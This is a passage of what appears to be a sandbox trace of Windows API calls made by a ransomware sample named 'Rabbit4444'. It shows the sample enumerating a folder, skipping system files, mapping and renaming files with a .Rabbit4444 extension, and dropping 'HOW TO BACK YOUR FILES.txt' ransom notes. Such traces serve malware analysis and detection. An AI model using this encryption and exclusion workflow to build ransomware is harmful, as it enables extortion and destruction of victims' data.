(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.180] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.180] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.181] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.181] CloseHandle (hObject=0x278) returned 1 [0056.181] CloseHandle (hObject=0x27c) returned 1 [0056.181] GetCurrentThreadId () returned 0xd98 [0056.181] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122208 [0056.181] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings" [0056.181] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124f20 | out: hHeap=0xe0000) returned 1 [0056.181] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0056.181] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings" [0056.181] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\" [0056.181] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0056.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.184] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.186] FlushFileBuffers (hFile=0x27c) returned 1 [0056.187] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.187] CloseHandle (hObject=0x27c) returned 1 [0056.188] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings") returned 91 [0056.188] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.188] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeacfa2bd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0056.188] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.188] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.188] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.188] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.188] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeacfa2bd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.188] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.188] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.188] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.188] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.188] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.188] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeacfa2bd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeacfa2bd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeacfa2bd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.188] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.188] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.188] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x9b33bde5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9b33bde5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0056.188] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.188] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.188] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0056.188] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0056.188] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0056.188] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0056.188] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0056.189] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0056.189] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0056.189] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0056.189] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0056.189] lstrcpyW (in: lpString1=0x130ebf0, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0056.189] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0056.189] lstrlenW (lpString="roaming.lock") returned 12 [0056.189] lstrlenW (lpString="Rabbit4444") returned 10 [0056.189] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0056.189] lstrlenW (lpString=".dll") returned 4 [0056.189] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0056.190] lstrlenW (lpString=".lnk") returned 4 [0056.190] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0056.190] lstrlenW (lpString=".ini") returned 4 [0056.190] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0056.190] lstrlenW (lpString=".sys") returned 4 [0056.190] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0056.190] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd8832b29, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xdac99df7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0056.190] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0056.190] lstrcpyW (in: lpString1=0x130ebf0, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0056.190] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0056.190] lstrlenW (lpString="settings.dat") returned 12 [0056.190] lstrlenW (lpString="Rabbit4444") returned 10 [0056.190] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0056.190] lstrlenW (lpString=".dll") returned 4 [0056.190] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0056.190] lstrlenW (lpString=".lnk") returned 4 [0056.190] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0056.190] lstrlenW (lpString=".ini") returned 4 [0056.191] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0056.191] lstrlenW (lpString=".sys") returned 4 [0056.191] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0056.191] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.191] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.191] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14750157450) returned 1 [0056.191] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0056.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0056.191] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x298 [0056.192] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0056.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124f20 [0056.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.194] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124f20 | out: hHeap=0xe0000) returned 1 [0056.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124f20 [0056.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124f20 | out: hHeap=0xe0000) returned 1 [0056.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.195] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14750537235) returned 1 [0056.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0056.195] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.195] CloseHandle (hObject=0x298) returned 1 [0056.195] CloseHandle (hObject=0x278) returned 1 [0056.195] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 115 [0056.195] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0056.196] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdaaf640d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdaaf640d, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdaaf640d, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0056.196] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0056.196] lstrcpyW (in: lpString1=0x130ebf0, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0056.196] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0056.197] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0056.197] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0056.197] lstrlenW (lpString="Rabbit4444") returned 10 [0056.197] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0056.197] lstrlenW (lpString=".dll") returned 4 [0056.197] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0056.197] lstrlenW (lpString=".lnk") returned 4 [0056.197] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0056.197] lstrlenW (lpString=".ini") returned 4 [0056.197] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0056.197] lstrlenW (lpString=".sys") returned 4 [0056.197] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0056.197] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.197] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.197] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14750810840) returned 1 [0056.197] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0056.197] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.197] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0056.198] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x298 [0056.199] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0056.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124f20 [0056.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124f20 | out: hHeap=0xe0000) returned 1 [0056.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124f20 [0056.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124f20 | out: hHeap=0xe0000) returned 1 [0056.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.200] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14751103692) returned 1 [0056.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0056.200] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.201] CloseHandle (hObject=0x298) returned 1 [0056.201] CloseHandle (hObject=0x278) returned 1 [0056.201] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444") returned 120 [0056.201] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0056.201] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdaaf640d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdaaf640d, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdaaf640d, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0056.201] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.201] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.201] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0056.201] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0056.201] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0056.202] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0056.202] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0056.202] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0056.202] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0056.202] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0056.202] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0056.202] lstrcpyW (in: lpString1=0x130ebf0, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0056.202] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0056.203] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0056.203] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0056.203] lstrlenW (lpString="Rabbit4444") returned 10 [0056.203] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0056.203] lstrlenW (lpString=".dll") returned 4 [0056.203] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0056.203] lstrlenW (lpString=".lnk") returned 4 [0056.203] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0056.203] lstrlenW (lpString=".ini") returned 4 [0056.203] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0056.203] lstrlenW (lpString=".sys") returned 4 [0056.203] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0056.203] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdaaf640d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdaaf640d, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdaaf640d, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0056.203] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0056.203] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.203] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.204] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.204] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.205] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.205] CloseHandle (hObject=0x278) returned 1 [0056.205] CloseHandle (hObject=0x27c) returned 1 [0056.205] GetCurrentThreadId () returned 0xd98 [0056.205] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0056.205] lstrcpynW (in: lpString1=0x130eb38, 